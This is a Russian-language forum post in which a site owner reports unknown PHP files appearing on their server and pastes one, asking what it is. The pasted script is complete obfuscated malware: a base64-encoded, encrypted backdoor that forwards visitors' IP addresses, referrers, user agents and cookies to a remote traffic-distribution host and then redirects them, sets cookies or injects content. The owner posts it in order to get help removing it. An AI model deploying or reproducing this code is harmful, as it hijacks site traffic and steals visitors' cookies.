Возникла проблема, пока не понимаю с чем она связана, но на сервере создаются левые скрипты.
Пример скрипта:
<?php $cfg='2pT70eNb1Rx+1unapJ71qSffAvciLTsi+jhLuGf4V+gFOH5bXbBOCZXUKDV/dnEwlZy5jhBLKb+PnCLR5Kh8b49Wcz12fhlVvT0JUwdsKgLlrQ9SLh6RXzpr5z32ybaUJoc+QFk0ZkbAOJU64gMlMUvMHmuJJEkpZixMa3srpmdYNeKlZEebIT3OGinJ5NwOg151ZwnYXuQrh4lVw68y5F4gdC2hvCSdxgySu4/jDK0xmeiS4g=='; ?>
<? function _329581727($i){$a=Array('N2RXM2daUXR6WA==','TGh4','','SCo=','bW9kZQ==','Y29uZmln','a2V5','a2V5','PGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZD0icG9zdCIgYWN0aW9uPT9tb2RlPXNldGNvbmZpZyZrZXk9','a2V5','PjxwcmU+ClREUzogICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzIiB2YWx1ZT0i','dXJs','Ij4gIFREUyBJUDogIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzaXAiIHZhbHVlPSI=','aXA=','Ij4KS0VZOiAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBrZXkiIHZhbHVlPSI=','a2V5','Ij4gIFJlc2VydmU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdG8iIHZhbHVlPSI=','bGlu','Ij4KSUQ6ICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBlc2RpZCIgdmFsdWU9Ig==','aWQ=','Ij4gIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9Im9rIj48L3ByZT4KPC9mb3JtPg==','c2V0Y29uZmln','a2V5','a2V5','Lw==','U0NSSVBUX05BTUU=','dXJs','cHRkcw==','aXA=','cHRkc2lw','bGlu','cHRv','aWQ=','cGVzZGlk','a2V5','cGtleQ==','dw==','','U2F2ZWQuCg==','a2lsbA==','a2V5','a2V5','Nzc3','U0NSSVBUX0ZJTEVOQU1F','U0NSSVBUX0ZJTEVOQU1F','b2sK','Lw==','dXJs','aXA=','aXA=','aHR0cDovLw==','SFRUUF9IT1NU','U0NSSVBUX05BTUU=','UkVNT1RFX0FERFI=','bm8=','SFRUUF9YX0ZPUldBUkRFRF9GT1I=','eWVz','SFRUUF9VU0VSX0FHRU5U','aWQ=','aWQ=','a2V5','Jg==','a2V5','PQ==','UVVFUllfU1RSSU5H','R0VUIA==','dXJs','P2RvbT0=','JnJlZj0=','JmlwPQ==','JnByb3g9','JmFnZW50PQ==','JmNvb2tpZT0=','JmVzZGlkPQ==','aWQ=','JmZyYW1laWQ9','IEhUVFAvMS4wDQo=','R0VUIA==','dXJs','P2RvbT0=','JnJlZj0=','JmlwPQ==','JnByb3g9','JmFnZW50PQ==','JmNvb2tpZT0=','JmVzZGlkPQ==','aWQ=','IEhUVFAvMS4wDQo=','SG9zdDog','DQo=','Q29ubmVjdGlvbjogQ2xvc2UNCg0K','DQo=','ZG8=','ZG8=','IA==','bGlu','MjAw','bGlu','Oi8v','aHR0cA==','SFRUUC8xLjEgMzAyIEZvdW5k','TG9jYXRpb246IA==','Y29vaw==','Jg==','PQ==','ZWNobw==');return base64_decode($a[$i]);} ?><?php error_reporting(0);$key=_329581727(0);function string_cpt($String,$Password){$Salt=_329581727(1);$StrLen=strlen($String);$Seq=$Password;$Gamma=_329581727(2);while(strlen($Gamma)<$StrLen){$Seq=pack(_329581727(3),sha1($Gamma .$Seq .$Salt));$Gamma .= substr($Seq,0,8);}return $String^$Gamma;}$c=unserialize(string_cpt(base64_decode($cfg),$key));$mode=$_REQUEST[_329581727(4)];if($mode == _329581727(5)AND $c[_329581727(6)]== $_REQUEST[_329581727(7)]){echo _329581727(8) .$_REQUEST[_329581727(9)] ._329581727(10) .$c[_329581727(11)] ._329581727(12) .$c[_329581727(13)] ._329581727(14) .$c[_329581727(15)] ._329581727(16) .$c[_329581727(17)] ._329581727(18) .$c[_329581727(19)] ._329581727(20);die();}if($mode == _329581727(21)AND $c[_329581727(22)]== $_REQUEST[_329581727(23)]){$sn=explode(_329581727(24),$_SERVER[_329581727(25)]);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$strng=$getlpa[0];$file=file($scr);for($i=0;$i<sizeof($file);$i++)if($i == 0){$c[_329581727(26)]=$_POST[_329581727(27)];$c[_329581727(28)]=$_POST[_329581727(29)];$c[_329581727(30)]=$_POST[_329581727(31)];$c[_329581727(32)]=$_POST[_329581727(33)];$c[_329581727(34)]=$_POST[_329581727(35)];$cfg=base64_encode(string_cpt(serialize($c),$key));$file[$i]="<?\$cfg='$cfg'; ?>\n";}$fp=fopen($scr,_329581727(36));if(fputs($fp,implode(_329581727(37),$file)))die(_329581727(38));fclose($fp);}if($mode == _329581727(39)AND $c[_329581727(40)]== $_REQUEST[_329581727(41)]){chmod(_329581727(42),$_SERVER[_329581727(43)]);if(unlink($_SERVER[_329581727(44)]))die(_329581727(45));}$dom=explode(_329581727(46),$c[_329581727(47)]);$dom=$dom[2];$dhost=$dom;if($c[_329581727(48)]){$dom=$c[_329581727(49)];}$fp=fsockopen($dom,80,$errno,$errstr,2);if(!$fp){$res=1;}else{$t_dom=urlencode(_329581727(50) .$_SERVER[_329581727(51)] .$_SERVER[_329581727(52)]);$t_ref=urlencode($_SERVER[HTTP_REFERER]);$t_ip=urlencode($_SERVER[_329581727(53)]);$t_prox=_329581727(54);if($_SERVER[_329581727(55)]){$t_prox=_329581727(56);}$t_agent=urlencode($_SERVER[_329581727(57)]);if(isset($_GET[_329581727(58)]))$t_frameid=urlencode($_GET[_329581727(59)]);foreach($_COOKIE as $c[_329581727(60)]=> $val){$t_cookie=$t_cookie ._329581727(61) .$c[_329581727(62)] ._329581727(63) .$val;}$t_cookie=urlencode($t_cookie);if(empty($t_cookie)){$t_cookie=urlencode($_SERVER[_329581727(64)]);}if(isset($t_frameid)){$out=_329581727(65) .$c[_329581727(66)] ._329581727(67) .$t_dom ._329581727(68) .$t_ref ._329581727(69) .$t_ip ._329581727(70) .$t_prox ._329581727(71) .$t_agent ._329581727(72) .$t_cookie ._329581727(73) .$c[_329581727(74)] ._329581727(75) .$t_frameid ._329581727(76);}else{$out=_329581727(77) .$c[_329581727(78)] ._329581727(79) .$t_dom ._329581727(80) .$t_ref ._329581727(81) .$t_ip ._329581727(82) .$t_prox ._329581727(83) .$t_agent ._329581727(84) .$t_cookie ._329581727(85) .$c[_329581727(86)] ._329581727(87);}$out .= _329581727(88) .$dhost ._329581727(89);$out .= _329581727(90);fwrite($fp,$out);while(!feof($fp)){$str=fgets($fp,128);$ch .= $str;if($str == _329581727(91)&& empty($he)){$he=_329581727(92);}if($he == _329581727(93)){$goto .= $str;}}fclose($fp);}$goto=substr($goto,2);$ch=explode(_329581727(94),$ch);if($res){$goto=$c[_329581727(95)];}if($ch[1]== _329581727(96)){}else{$goto=$c[_329581727(97)];}$gotoe=explode(_329581727(98),$goto);If($gotoe[0]== _329581727(99)){header(_329581727(100));header(_329581727(101) .$goto);}$goto_body=substr($goto,7);If($gotoe[0]== _329581727(102)){$gotoee=explode(_329581727(103),$goto_body);foreach($gotoee as $setcook){$set=explode(_329581727(104),$setcook);setcookie($set[0],$set[1]);}}If($gotoe[0]== _329581727(105)){echo $goto_body;} ?>
Еще заметил что скрипты генерятся на тех доменах, где есть .htaccess.
В содержании .htaccess нет ничего такого, что могло бы привести к их генерации.
Пожалуйста помогите, что за скрипт и почему он генерируется.
Спасибо вам.